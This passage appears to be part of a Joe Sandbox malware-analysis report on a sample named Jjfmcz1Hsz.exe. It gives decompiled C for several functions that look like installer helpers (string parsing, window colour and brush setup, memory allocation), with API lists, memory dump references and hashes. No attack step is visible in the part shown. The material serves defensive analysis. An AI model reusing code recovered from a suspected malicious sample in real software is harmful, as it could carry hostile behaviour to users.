                                                                                                                                                                            							E00405927(_t16, _t17, CharNextA(_t17) - _t17);
                                                                                                                                                                            							_t16 = CharNextA(_t16);
                                                                                                                                                                            						}
                                                                                                                                                                            						_t17 = CharNextA(_t17);
                                                                                                                                                                            						_t5 =  *_t17;
                                                                                                                                                                            					} while (_t5 != 0);
                                                                                                                                                                            				}
                                                                                                                                                                            				 *_t16 =  *_t16 & 0x00000000;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t16 = CharPrevA(_t15, _t16);
                                                                                                                                                                            					_t7 =  *_t16;
                                                                                                                                                                            					if(_t7 != 0x20 && _t7 != 0x5c) {
                                                                                                                                                                            						break;
                                                                                                                                                                            					}
                                                                                                                                                                            					 *_t16 =  *_t16 & 0x00000000;
                                                                                                                                                                            					if(_t15 < _t16) {
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					break;
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t7;
                                                                                                                                                                            			}








                                                                                                                                                                            0x00405f66
                                                                                                                                                                            0x00405f6e
                                                                                                                                                                            0x00405f82
                                                                                                                                                                            0x00405f82
                                                                                                                                                                            0x00405f88
                                                                                                                                                                            0x00405f95
                                                                                                                                                                            0x00405f95
                                                                                                                                                                            0x00405f96
                                                                                                                                                                            0x00405f98
                                                                                                                                                                            0x00405f9c
                                                                                                                                                                            0x00405f9e
                                                                                                                                                                            0x00405fa7
                                                                                                                                                                            0x00405fa9
                                                                                                                                                                            0x00405fc3
                                                                                                                                                                            0x00405fcb
                                                                                                                                                                            0x00405fcb
                                                                                                                                                                            0x00405fd0
                                                                                                                                                                            0x00405fd2
                                                                                                                                                                            0x00405fd4
                                                                                                                                                                            0x00405fd8
                                                                                                                                                                            0x00405fd9
                                                                                                                                                                            0x00405fdc
                                                                                                                                                                            0x00405fe4
                                                                                                                                                                            0x00405fe6
                                                                                                                                                                            0x00405fea
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405ff0
                                                                                                                                                                            0x00405ff5
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00405ff5
                                                                                                                                                                            0x00405ffa

                                                                                                                                                                            APIs
                                                                                                                                                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Jjfmcz1Hsz.exe",76803410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 00405FBC
                                                                                                                                                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405FC9
                                                                                                                                                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\Jjfmcz1Hsz.exe",76803410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 00405FCE
                                                                                                                                                                            • CharPrevA.USER32(?,?,76803410,C:\Users\user\AppData\Local\Temp\,00000000,004030B4,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004032C9), ref: 00405FDE
                                                                                                                                                                            Strings
                                                                                                                                                                            • "C:\Users\user\Desktop\Jjfmcz1Hsz.exe", xrefs: 00405FA0
                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F65
                                                                                                                                                                            • *?|<>/":, xrefs: 00405FAC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Char$Next$Prev
                                                                                                                                                                            • String ID: "C:\Users\user\Desktop\Jjfmcz1Hsz.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                            • API String ID: 589700163-2750549591
                                                                                                                                                                            • Opcode ID: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                                                                                            • Instruction ID: a0964663e3c08fb0288e5f4f4a0160773f2bbbf5a4d40b443b4f636863f092b1
                                                                                                                                                                            • Opcode Fuzzy Hash: ce3d7990729f771fdc32bb0ed1b54e2c2469674ae1568702cd8079844570f2a1
                                                                                                                                                                            • Instruction Fuzzy Hash: C611C451808F922EEB3216640C44BBB7F99CF5A760F18007BE9D4B22C2D67C5C429F6E
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                            			E00403F45(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                                                                                            				struct tagLOGBRUSH _v16;
                                                                                                                                                                            				long _t35;
                                                                                                                                                                            				long _t37;
                                                                                                                                                                            				void* _t40;
                                                                                                                                                                            				long* _t49;
                                                                                                                                                                            
                                                                                                                                                                            				if(_a4 + 0xfffffecd > 5) {
                                                                                                                                                                            					L15:
                                                                                                                                                                            					return 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                                                                                                            				if(_t49 == 0) {
                                                                                                                                                                            					goto L15;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t35 =  *_t49;
                                                                                                                                                                            				if((_t49[5] & 0x00000002) != 0) {
                                                                                                                                                                            					_t35 = GetSysColor(_t35);
                                                                                                                                                                            				}
                                                                                                                                                                            				if((_t49[5] & 0x00000001) != 0) {
                                                                                                                                                                            					SetTextColor(_a8, _t35);
                                                                                                                                                                            				}
                                                                                                                                                                            				SetBkMode(_a8, _t49[4]);
                                                                                                                                                                            				_t37 = _t49[1];
                                                                                                                                                                            				_v16.lbColor = _t37;
                                                                                                                                                                            				if((_t49[5] & 0x00000008) != 0) {
                                                                                                                                                                            					_t37 = GetSysColor(_t37);
                                                                                                                                                                            					_v16.lbColor = _t37;
                                                                                                                                                                            				}
                                                                                                                                                                            				if((_t49[5] & 0x00000004) != 0) {
                                                                                                                                                                            					SetBkColor(_a8, _t37);
                                                                                                                                                                            				}
                                                                                                                                                                            				if((_t49[5] & 0x00000010) != 0) {
                                                                                                                                                                            					_v16.lbStyle = _t49[2];
                                                                                                                                                                            					_t40 = _t49[3];
                                                                                                                                                                            					if(_t40 != 0) {
                                                                                                                                                                            						DeleteObject(_t40);
                                                                                                                                                                            					}
                                                                                                                                                                            					_t49[3] = CreateBrushIndirect( &_v16);
                                                                                                                                                                            				}
                                                                                                                                                                            				return _t49[3];
                                                                                                                                                                            			}








                                                                                                                                                                            0x00403f57
                                                                                                                                                                            0x00403feb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403feb
                                                                                                                                                                            0x00403f68
                                                                                                                                                                            0x00403f6c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00403f72
                                                                                                                                                                            0x00403f7b
                                                                                                                                                                            0x00403f7e
                                                                                                                                                                            0x00403f7e
                                                                                                                                                                            0x00403f84
                                                                                                                                                                            0x00403f8a
                                                                                                                                                                            0x00403f8a
                                                                                                                                                                            0x00403f96
                                                                                                                                                                            0x00403f9c
                                                                                                                                                                            0x00403fa3
                                                                                                                                                                            0x00403fa6
                                                                                                                                                                            0x00403fa9
                                                                                                                                                                            0x00403fab
                                                                                                                                                                            0x00403fab
                                                                                                                                                                            0x00403fb3
                                                                                                                                                                            0x00403fb9
                                                                                                                                                                            0x00403fb9
                                                                                                                                                                            0x00403fc3
                                                                                                                                                                            0x00403fc8
                                                                                                                                                                            0x00403fcb
                                                                                                                                                                            0x00403fd0
                                                                                                                                                                            0x00403fd3
                                                                                                                                                                            0x00403fd3
                                                                                                                                                                            0x00403fe3
                                                                                                                                                                            0x00403fe3
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            • GetWindowLongA.USER32(?,000000EB), ref: 00403F62
                                                                                                                                                                            • GetSysColor.USER32(00000000), ref: 00403F7E
                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 00403F8A
                                                                                                                                                                            • SetBkMode.GDI32(?,?), ref: 00403F96
                                                                                                                                                                            • GetSysColor.USER32(?), ref: 00403FA9
                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00403FB9
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00403FD3
                                                                                                                                                                            • CreateBrushIndirect.GDI32(?), ref: 00403FDD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1199265707.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1199203612.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199348328.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199395587.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199504236.0000000000414000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199619601.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199666920.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199710810.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199764798.0000000000436000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199807226.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1199847230.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2320649405-0
                                                                                                                                                                            • Opcode ID: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                                                                                            • Instruction ID: 563dd17f99c902cd34f005863f03740a6a5938172a6e5e033378c94734032825
                                                                                                                                                                            • Opcode Fuzzy Hash: e8c91e704ef8b2f1a11ad189bfd14f771d09f9d58710722270f9777396a44b4e
                                                                                                                                                                            • Instruction Fuzzy Hash: B4214271908705ABC7219F68DD48F4BBFF8AF01715B048A29E895E26E0D735EA04CB55
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 87%
                                                                                                                                                                            			E100021FA(void* __edx, intOrPtr _a4) {
                                                                                                                                                                            				signed int _v4;
                                                                                                                                                                            				void* _t36;
                                                                                                                                                                            				signed int _t37;
                                                                                                                                                                            				void* _t38;
                                                                                                                                                                            				void* _t47;
                                                                                                                                                                            				signed int* _t49;
                                                                                                                                                                            				signed int* _t50;
                                                                                                                                                                            				void* _t51;
                                                                                                                                                                            
                                                                                                                                                                            				_v4 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					_t9 = _a4 + 0x818; // 0x818
                                                                                                                                                                            					_t50 = (_v4 << 5) + _t9;
                                                                                                                                                                            					_t36 = _t50[6];
                                                                                                                                                                            					if(_t36 == 0) {
                                                                                                                                                                            						goto L9;
                                                                                                                                                                            					}
                                                                                                                                                                            					_t47 = 0x1a;
                                                                                                                                                                            					if(_t36 == _t47) {
                                                                                                                                                                            						goto L9;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(_t36 != 0xffffffff) {
                                                                                                                                                                            						if(_t36 <= 0 || _t36 > 0x19) {
                                                                                                                                                                            							_t50[6] = _t47;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t36 = E100012AD(_t36 - 1);
                                                                                                                                                                            							L10:
                                                                                                                                                                            						}
                                                                                                                                                                            						goto L11;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t36 = E1000123B();
                                                                                                                                                                            						L11:
                                                                                                                                                                            						_t51 = _t36;
                                                                                                                                                                            						_t13 =  &(_t50[2]); // 0x820
                                                                                                                                                                            						_t49 = _t13;
                                                                                                                                                                            						if(_t50[1] != 0xffffffff) {
                                                                                                                                                                            						}
                                                                                                                                                                            						_t37 =  *_t50;
                                                                                                                                                                            						_t50[7] = _t50[7] & 0x00000000;
                                                                                                                                                                            						if(_t37 > 7) {
                                                                                                                                                                            							L27:
                                                                                                                                                                            							_t38 = GlobalFree(_t51);
                                                                                                                                                                            							if(_v4 == 0) {
                                                                                                                                                                            								return _t38;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_v4 !=  *((intOrPtr*)(_a4 + 0x814))) {
                                                                                                                                                                            								_v4 = _v4 + 1;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_v4 = _v4 & 0x00000000;
                                                                                                                                                                            							}
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							switch( *((intOrPtr*)(_t37 * 4 +  &M10002380))) {
                                                                                                                                                                            								case 0:
                                                                                                                                                                            									 *_t49 =  *_t49 & 0x00000000;
                                                                                                                                                                            									goto L27;
                                                                                                                                                                            								case 1:
                                                                                                                                                                            									__eax = E100012FE(__ebp);
                                                                                                                                                                            									goto L20;
                                                                                                                                                                            								case 2:
                                                                                                                                                                            									 *__ebx = E100012FE(__ebp);
                                                                                                                                                                            									 *((intOrPtr*)(__ebx + 4)) = __edx;
                                                                                                                                                                            									goto L27;
                                                                                                                                                                            								case 3:
                                                                                                                                                                            									__eax = E10001224(__ebp);
                                                                                                                                                                            									 *(__esi + 0x1c) = __eax;
                                                                                                                                                                            									L20:
                                                                                                                                                                            									 *__ebx = __eax;
                                                                                                                                                                            									goto L27;
                                                                                                                                                                            								case 4:
                                                                                                                                                                            									 *0x1000405c =  *0x1000405c +  *0x1000405c;
                                                                                                                                                                            									__edi = GlobalAlloc(0x40,  *0x1000405c +  *0x1000405c);
                                                                                                                                                                            									 *0x1000405c = MultiByteToWideChar(0, 0, __ebp,  *0x1000405c, __edi,  *0x1000405c);
                                                                                                                                                                            									if( *__esi != 5) {
                                                                                                                                                                            										 *(__esi + 0x1c) = __edi;
                                                                                                                                                                            										 *__ebx = __edi;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										__eax = GlobalAlloc(0x40, 0x10);
                                                                                                                                                                            										_push(__eax);
                                                                                                                                                                            										 *(__esi + 0x1c) = __eax;
                                                                                                                                                                            										_push(__edi);
                                                                                                                                                                            										 *__ebx = __eax;
                                                                                                                                                                            										__imp__CLSIDFromString();
                                                                                                                                                                            										__eax = GlobalFree(__edi);
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L27;
                                                                                                                                                                            								case 5:
                                                                                                                                                                            									if(lstrlenA(__ebp) > 0) {
                                                                                                                                                                            										__eax = E100012FE(__ebp);
                                                                                                                                                                            										 *__edi = __eax;
                                                                                                                                                                            									}
                                                                                                                                                                            									goto L27;
                                                                                                                                                                            								case 6:
                                                                                                                                                                            									__esi =  *(__esi + 0x18);
                                                                                                                                                                            									__esi = __esi - 1;
                                                                                                                                                                            									__esi = __esi *  *0x1000405c;
                                                                                                                                                                            									__esi = __esi +  *0x10004064;
                                                                                                                                                                            									__eax = __esi + 0xc;
                                                                                                                                                                            									 *__edi = __esi + 0xc;
                                                                                                                                                                            									asm("cdq");
                                                                                                                                                                            									__eax = E10001429(__edx, __esi + 0xc, __edx, __esi);
                                                                                                                                                                            									goto L27;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					L9:
                                                                                                                                                                            					_t36 = E10001224(0x10004034);
                                                                                                                                                                            					goto L10;
                                                                                                                                                                            				}
                                                                                                                                                                            			}











                                                                                                                                                                            0x1000220e
                                                                                                                                                                            0x10002212
                                                                                                                                                                            0x1000221d
                                                                                                                                                                            0x1000221d
                                                                                                                                                                            0x10002224
                                                                                                                                                                            0x10002229
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000222d
                                                                                                                                                                            0x10002230
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002235
                                                                                                                                                                            0x10002240
                                                                                                                                                                            0x10002250
                                                                                                                                                                            0x10002247
                                                                                                                                                                            0x10002249
                                                                                                                                                                            0x1000225f
                                                                                                                                                                            0x1000225f
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002237
                                                                                                                                                                            0x10002237
                                                                                                                                                                            0x10002260
                                                                                                                                                                            0x10002264
                                                                                                                                                                            0x10002266
                                                                                                                                                                            0x10002266
                                                                                                                                                                            0x10002269
                                                                                                                                                                            0x10002269
                                                                                                                                                                            0x10002271
                                                                                                                                                                            0x10002273
                                                                                                                                                                            0x1000227a
                                                                                                                                                                            0x10002349
                                                                                                                                                                            0x1000234a
                                                                                                                                                                            0x10002355
                                                                                                                                                                            0x1000237f
                                                                                                                                                                            0x1000237f
                                                                                                                                                                            0x10002365
                                                                                                                                                                            0x10002371
                                                                                                                                                                            0x10002367
                                                                                                                                                                            0x10002367
                                                                                                                                                                            0x10002367
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002280
                                                                                                                                                                            0x10002280
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002287
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002290
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000229e
                                                                                                                                                                            0x100022a0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100022a9
                                                                                                                                                                            0x100022ae
                                                                                                                                                                            0x100022b1
                                                                                                                                                                            0x100022b2
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100022be
                                                                                                                                                                            0x100022c9
                                                                                                                                                                            0x100022d8
                                                                                                                                                                            0x100022e1
                                                                                                                                                                            0x10002303
                                                                                                                                                                            0x10002306
                                                                                                                                                                            0x100022e3
                                                                                                                                                                            0x100022e7
                                                                                                                                                                            0x100022ed
                                                                                                                                                                            0x100022ee
                                                                                                                                                                            0x100022f1
                                                                                                                                                                            0x100022f2
                                                                                                                                                                            0x100022f4
                                                                                                                                                                            0x100022fb
                                                                                                                                                                            0x100022fb
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002313
                                                                                                                                                                            0x10002316
                                                                                                                                                                            0x10002322
                                                                                                                                                                            0x10002324
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002327
                                                                                                                                                                            0x1000232a
                                                                                                                                                                            0x1000232b
                                                                                                                                                                            0x10002332
                                                                                                                                                                            0x10002339
                                                                                                                                                                            0x1000233c
                                                                                                                                                                            0x1000233e
                                                                                                                                                                            0x10002341
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002280
                                                                                                                                                                            0x1000227a
                                                                                                                                                                            0x10002255
                                                                                                                                                                            0x1000225a
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000225a

                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                                                                                                                                              • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 100022C3
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100022E7
                                                                                                                                                                            • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000002.00000002.1202605160.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000002.00000002.1202572962.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202644162.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            • Associated: 00000002.00000002.1202672082.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10000000_Jjfmcz1Hsz.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3730416702-0
                                                                                                                                                                            • Opcode ID: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                                                                                                            • Instruction ID: bfa8c22ebd78897ea4dc14f883c746723b208fa17a75ef0c69fbb79ff87ab60c
                                                                                                                                                                            • Opcode Fuzzy Hash: 8ca201b8c9dcbb45ad50e4cb45e4e1ae2e8a5d70f393ea2d6c63899163ff979d
                                                                                                                                                                            • Instruction Fuzzy Hash: B541ABB1108311EFF320DFA48884B5BB7F8FF443D1F218529F946D61A9DB34AA448B61
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 78%
                                                                                                                                                                            			E100023DA(intOrPtr* _a4) {
                                                                                                                                                                            				char _v80;
                                                                                                                                                                            				intOrPtr _v84;
                                                                                                                                                                            				short _v92;
                                                                                                                                                                            				intOrPtr* _t22;
                                                                                                                                                                            				void* _t24;
                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                            				signed int _t33;
                                                                                                                                                                            				void* _t37;
                                                                                                                                                                            				intOrPtr _t38;
                                                                                                                                                                            				void* _t41;
                                                                                                                                                                            
                                                                                                                                                                            				_t37 = E10001215();
                                                                                                                                                                            				_t22 = _a4;
                                                                                                                                                                            				_t38 =  *((intOrPtr*)(_t22 + 0x814));
                                                                                                                                                                            				_v84 = _t38;
                                                                                                                                                                            				_t41 = (_t38 + 0x41 << 5) + _t22;
                                                                                                                                                                            				do {
                                                                                                                                                                            					if( *((intOrPtr*)(_t41 - 4)) != 0xffffffff) {
                                                                                                                                                                            					}
                                                                                                                                                                            					_t33 =  *(_t41 - 8);
                                                                                                                                                                            					if(_t33 <= 7) {
                                                                                                                                                                            						switch( *((intOrPtr*)(_t33 * 4 +  &M100024FD))) {
                                                                                                                                                                            							case 0:
                                                                                                                                                                            								 *_t37 = 0;
                                                                                                                                                                            								goto L15;
                                                                                                                                                                            							case 1:
                                                                                                                                                                            								_push( *__eax);
                                                                                                                                                                            								goto L13;
                                                                                                                                                                            							case 2:
                                                                                                                                                                            								__eax = E10001429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                                                                                                                                                            								goto L14;
                                                                                                                                                                            							case 3:
                                                                                                                                                                            								__eax = lstrcpynA(__edi,  *__eax,  *0x1000405c);
                                                                                                                                                                            								goto L15;
                                                                                                                                                                            							case 4:
                                                                                                                                                                            								__ecx =  *0x1000405c;
                                                                                                                                                                            								__edx = __ecx - 1;
                                                                                                                                                                            								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
                                                                                                                                                                            								__eax =  *0x1000405c;
                                                                                                                                                                            								 *((char*)(__eax + __edi - 1)) = __bl;
                                                                                                                                                                            								goto L15;
                                                                                                                                                                            							case 5:
                                                                                                                                                                            								__ecx =  &_v80;
                                                                                                                                                                            								_push(0x27);
                                                                                                                                                                            								_push( &_v80);
                                                                                                                                                                            								_push( *__eax);
                                                                                                                                                                            								__imp__StringFromGUID2();
                                                                                                                                                                            								__eax =  &_v92;
                                                                                                                                                                            								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x1000405c, __ebx, __ebx);
                                                                                                                                                                            								goto L15;
                                                                                                                                                                            							case 6:
                                                                                                                                                                            								_push( *__esi);
                                                                                                                                                                            								L13:
                                                                                                                                                                            								__eax = wsprintfA(__edi, 0x10004000);
                                                                                                                                                                            								L14:
                                                                                                                                                                            								__esp = __esp + 0xc;
                                                                                                                                                                            								goto L15;
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					L15:
                                                                                                                                                                            					_t24 =  *(_t41 + 0x14);
                                                                                                                                                                            					if(_t24 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t41 - 4)) > 0)) {
                                                                                                                                                                            						GlobalFree(_t24);
                                                                                                                                                                            					}
                                                                                                                                                                            					_t25 =  *((intOrPtr*)(_t41 + 0xc));
                                                                                                                                                                            					if(_t25 != 0) {
                                                                                                                                                                            						if(_t25 != 0xffffffff) {
                                                                                                                                                                            							if(_t25 > 0) {
                                                                                                                                                                            								E100012D1(_t25 - 1, _t37);
                                                                                                                                                                            								goto L24;
                                                                                                                                                                            							}
                                                                                                                                                                            						} else {
                                                                                                                                                                            							E10001266(_t37);
                                                                                                                                                                            							L24:
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_v84 = _v84 - 1;
                                                                                                                                                                            					_t41 = _t41 - 0x20;
                                                                                                                                                                            				} while (_v84 >= 0);
                                                                                                                                                                            				return GlobalFree(_t37);
                                                                                                                                                                            			}













                                                                                                                                                                            0x100023e6
                                                                                                                                                                            0x100023e8
                                                                                                                                                                            0x100023f2
                                                                                                                                                                            0x100023f8
                                                                                                                                                                            0x10002402
                                                                                                                                                                            0x10002406
                                                                                                                                                                            0x1000240a
                                                                                                                                                                            0x1000240a
                                                                                                                                                                            0x10002412
                                                                                                                                                                            0x10002418
                                                                                                                                                                            0x1000241e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002425
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002429
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002433
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10002443
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000246f
                                                                                                                                                                            0x10002477
                                                                                                                                                                            0x10002481
                                                                                                                                                                            0x10002483
                                                                                                                                                                            0x10002488
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000244b
                                                                                                                                                                            0x1000244f
                                                                                                                                                                            0x10002451
                                                                                                                                                                            0x10002452
                                                                                                                                                                            0x10002454
                                                                                                                                                                            0x10002464
                                                                                                                                                                            0x1000246b
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000248e
                                                                                                                                                                            0x10002490
                                                                                                                                                                            0x10002496
                                                                                                                                                                            0x1000249c
                                                                                                                                                                            0x1000249c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1000241e
                                                                                                                                                                            0x1000249f
                                                                                                                                                                            0x1000249f
                                                                                                                                                                            0x100024a4
                                                                                                                                                                            0x100024b5
                                                                                                                                                                            0x100024b5
                                                                                                                                                                            0x100024bb
                                                                                                                                                                            0x100024c0
                                                                                                                                                                            0x100024c5
                                                                                                                                                                            0x100024d1
                                                                                                                                                                            0x100024d6
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x100024db
                                                                                                                                                                            0x100024c7
                                                                                                                                                                            0x100024c8
                                                                                                                                                                            0x100024dc
                                                                                                                                                                            0x100024dc
                                                                                                                                                                            0x100024c5
                                                                                                                                                                            0x100024dd
                                                                                                                                                                            0x100024e1
                                                                                                                                                                            0x100024e4
                                                                                                                                                                            0x100024fc

                                                                                                                                                                            APIs
